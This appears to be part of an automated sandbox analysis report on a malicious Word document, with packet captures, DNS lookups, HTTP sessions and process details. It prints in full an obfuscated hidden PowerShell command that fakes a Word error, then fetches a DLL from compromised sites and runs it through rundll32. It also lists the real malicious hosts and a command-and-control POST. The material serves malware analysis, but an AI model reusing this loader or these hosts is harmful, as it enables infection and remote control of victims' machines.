                                            Jan 6, 2021 08:57:41.503628969 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503645897 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503660917 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503671885 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.503681898 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503693104 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.503694057 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503707886 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503720045 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503740072 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503758907 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503774881 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503792048 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503801107 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.503808022 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503815889 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.503823996 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503839970 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503871918 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577363968 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577418089 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577435970 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577452898 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577471018 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577486038 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577498913 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577512026 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577533007 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577534914 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577550888 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577567101 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577570915 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577577114 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577584028 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577600002 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577613115 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577620029 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577636957 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577644110 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577652931 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577672958 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577675104 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577694893 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577713013 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577727079 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577730894 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577747107 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577763081 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577764034 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577779055 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577794075 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577797890 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577814102 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577822924 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577833891 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577852011 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577867985 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577868938 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577883959 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577899933 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577900887 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577915907 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577931881 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577943087 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.577950954 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577969074 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577985048 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.577987909 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.578001022 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.578016043 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.578016996 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.578030109 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.578047037 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.578047037 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.578062057 CET8049167176.53.69.151192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:57:41.178471088 CET5219753192.168.2.228.8.8.8
                                            Jan 6, 2021 08:57:41.234630108 CET53521978.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 6, 2021 08:57:41.178471088 CET192.168.2.228.8.8.80x70c0Standard query (0)petafilm.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 6, 2021 08:57:41.234630108 CET8.8.8.8192.168.2.220x70c0No error (0)petafilm.com176.53.69.151A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • petafilm.com
                                            • 5.2.136.90

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249167176.53.69.15180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:57:41.325428963 CET0OUTGET /wp-admin/4m/ HTTP/1.1
                                            Host: petafilm.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:57:41.428926945 CET1INHTTP/1.1 200 OK
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: Wed, 06 Jan 2021 07:57:52 GMT
                                            Last-Modified: Wed, 06 Jan 2021 07:57:52 GMT
                                            Server: Microsoft-IIS/10.0
                                            Set-Cookie: 5ff56d802ad3f=1609919872; expires=Wed, 06-Jan-2021 07:58:52 GMT; Max-Age=60; path=/
                                            Content-Disposition: attachment; filename="bLH.dll"
                                            Content-Transfer-Encoding: binary
                                            X-Powered-By: ASP.NET
                                            X-Powered-By-Plesk: PleskWin
                                            Date: Wed, 06 Jan 2021 07:57:51 GMT
                                            Content-Length: 192000
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.22491685.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:57:58.728990078 CET200OUTPOST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1
                                            DNT: 0
                                            Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/
                                            Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXk
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 5.2.136.90
                                            Content-Length: 6100
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 6, 2021 08:57:59.362884998 CET208INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:57:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 63 33 34 0d 0a 71 f8 6a 66 87 a1 25 06 04 73 a6 12 3d eb 1d 49 c3 9c 55 0e 72 da 5e 88 32 4c 20 b6 85 5b 94 bd dd f8 a3 4d 10 f4 7d 2c 55 da 13 c0 77 8c 5d 86 79 d0 d9 a4 ab ce 46 b4 9b 4e e3 b3 11 21 25 33 c3 37 c0 ed 0f cc aa a5 8d 98 b8 54 82 c8 1c 51 47 39 69 73 6d ba 70 5c 1a 74 64 20 68 40 b5 db 63 1c 7b 11 76 b0 c1 a1 46 8c 01 33 56 8f a5 0a b6 6a 27 54 a2 08 87 f4 7d 32 b4 60 6e e5 f1 ab 4d 27 12 1b 5d 42 28 b7 ba 41 51 42 3a 09 76 27 80 55 3d 4a dc 54 b3 1d 2e 92 fa e8 80 9b 9f 07 df 72 ff 85 a0 24 5b a0 21 8c 7c 25 97 fa c5 60 c9 5d 20 21 e1 40 0f 3d 3b 17 eb b1 74 10 7f 8e 7b 93 e8 1f fa ea f1 73 f1 46 88 2a 62 12 3d ae 76 b4 93 ed 18 14 ab ec c1 60 48 ba f9 c4 52 86 58 5c dd 26 17 f7 67 3b b3 49 32 96 3c cc b9 65 16 8b 1b 58 c4 41 72 e6 d4 17 d0 68 c1 9e f4 c7 b2 fb 30 5e af 02 47 58 63 d1 02 b3 16 08 2e 2d 8d bd b7 66 43 81 23 a7 58 62 89 30 0f 43 bd 04 16 cc 6d 7a e3 31 69 0f 76 84 59 e4 31 07 15 da 6d 8f ad 29 89 f7 ce 12 0c 6e 4e 87 af 7e 77 2f bd 77 78 a5 bb 33 da 7d 78 7c 88 83 4d b5 9e 67 bf 62 8b af 86 f4 59 e4 c8 be 80 17 af 3d a9 78 46 f5 1b f0 be a6 f0 da 82 ae 12 f9 42 f1 b4 9d 0e ea e3 df 83 57 55 57 31 f8 4c a1 8d 96 45 a4 9e 6d f1 7e 0f 78 25 b1 f3 27 c4 f4 4e 9a cd d0 dd 49 e4 fc 1f 2e c6 f4 c3 62 cf f7 af 9e 38 43 90 af 13 44 bf 49 f2 6f c9 9b 73 5f c0 95 27 a4 f4 b4 6b b7 c2 0c d5 5c 05 60 18 9f 45 1e 30 ea dd 12 76 2c 2e 5f 5f 3c 3c 75 3d 7d bc b8 42 2a 54 82 76 bf e6 a5 e4 ec 0a 42 3c 0a d9 e7 a6 fa 7e da 95 de ec 0e 5b 09 41 5b 8d dc e5 4c 8f b2 7e fa 3c 7d 65 6a 8e d5 f7 16 6a 10 83 49 9a c2 78 eb a1 fb 89 7d 60 c0 bf 65 3b 17 d9 af fd bc 92 fb fd c7 73 13 fa 8f 15 88 1f 1e ce ed 1e 73 a2 db 2b 86 dc aa fd ac 66 57 52 b6 82 c2 1c dd 09 86 c9 ae 44 ae a7 3d 19 6b 4d 57 da 4c 07 6b db f6 95 3e 5e aa de 4d 04 16 4e 8b f7 2c 28 ce f4 ed 3d f9 76 56 a5 d6 cc 46 7a 67 3c a5 9b 87 ef d8 6b 34 51 88 8d e3 a5 2b 7c 26 7e 58 ea 56 71 42 41 1b ee d2 a3 71 35 03 bf 35 99 9d b7 c3 8c e0 9b 4a 1d d0 ee 41 89 7c 51 5f 77 d4 73 10 ee 28 50 e3 90 d9 ea 46 e3 2f 61 e5 ec 09 5e 87 38 d2 9e b0 b7 2d 12 73 95 8a 29 96 4d 43 d0 c2 4e 9b a9 cc eb 85 32 af e1 95 17 df b6 90 bb f6 db 64 26 26 33 93 56 51 de a1 f3 f4 12 64 ca 74 d0 73 12 71 86 e1 75 3c 44 01 49 47 44 49 74 a9 5e b7 33 05 63 1c 0e cb c6 2e 07 10 d7 f3 2d 90 41 7f 79 21 86 27 68 78 c8 78 34 03 04 d0 9b b7 ae d6 a7 f9 0d 0d 4f f3 ca 7b 93 a4 29 a0 a0 df fa 1d 90 da 89 de a7 2d 83 8f 0b bb be ef 26 49 c1 04 ff 18 26 2a e4 d1 c0 19 ec 9f 12 71 8b fe 97 11 80 68 35 38 c5 09 3d 99 8f ba 84 8f 53 b7 07 5a 97 78 51 38 97 79 5d 8e 2b 5b 4c 33 1b ab 89 51 a6 d5 5f ec 9a 24 1b b6 64 86 94 f7 2d cc d7 c4 b8 82 12 3a af e4 e3 fd 92 e9 d9 f5 69 9a be 91 a0 fa d3 5a ad 4f 66 54 50 00 7e 01 92 16 bd ba 8b 1a 7f 38 88 5e 06 1a f1 71 c5 e7 8f 4f df ab 57 7b 06 10 c4 b1 e8 f2 19 3a f9 24 4f 33 d9 27 24 7b 10 35 77 78 29 2a 7b 2b 07 b6 96 34 9c a4 1c ca 24 cc 94 75 5c a5 a8 c9 2b 0e 67 ef 81 c0 ba 5d 6c 47 f7 46 61 a7 07 6f 24 61 3e 75 f3 b4 8b 0d 36 15 bc 53 75 7a 10 01 dd cf 09 45 b1 85 9e b2 f6 92 bb 83 eb 37 16 59 05 fe da c0 ec cf 86 9e dc 20 d6 54 78 3c a4 1b cb 9b 54 20 00 d7 36 a8 69 1b 0b 86 09 2c 40 ea 0d 78 62 0d ba 94 3d 74 14 c3 eb 49 a5 5d d4 97 29 8b 60 f4 8e 6f a2 ee c8 5b 70 7b fc 2b d1 f0 1d 29 cf 02 95 1d 9b 51 6e aa 51 62 dd cd d0 25 8b bd 9f 7e 95 8c 49 de 76 12 26 dc 43 77 c7 35 5a 8e c9 55 b1 6c 21 ca f9 e1 9e a0 b0 2e 8a 8a e0 62 1e 9a ca e4 8a 86 3c 21 36 20 94 a3 89 a5 4e 46 8c 75 0e dd 01 8b f8 e2 0e 29 25 92 32
                                            Data Ascii: c34qjf%s=IUr^2L [M},Uw]yFN!%37TQG9ismp\td h@c{vF3Vj'T}2`nM']B(AQB:v'U=JT.r$[!|%`] !@=;t{sF*b=v`HRX\&g;I2<eXArh0^GXc.-fC#Xb0Cmz1ivY1m)nN~w/wx3}x|MgbY=xFBWUW1LEm~x%'NI.b8CDIos_'k\`E0v,.__<<u=}B*TvB<~[A[L~<}ejjIx}`e;ss+fWRD=kMWLk>^MN,(=vVFzg<k4Q+|&~XVqBAq55JA|Q_ws(PF/a^8-s)MCN2d&&3VQdtsqu<DIGDIt^3c.-Ay!'hxx4O{)-&I&*qh58=SZxQ8y]+[L3Q_$d-:iZOfTP~8^qOW{:$O3'${5wx)*{+4$u\+g]lGFao$a>u6SuzE7Y Tx<T 6i,@xb=tI])`o[p{+)QnQb%~Iv&Cw5ZUl!.b<!6 NFu)%2


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: WINWORD.EXE PID: 2320 Parent PID: 584

                                            General

                                            Start time:08:57:39
                                            Start date:06/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fd60000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: cmd.exe PID: 2632 Parent PID: 1220

                                            General

                                            Start time:08:57:41
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAn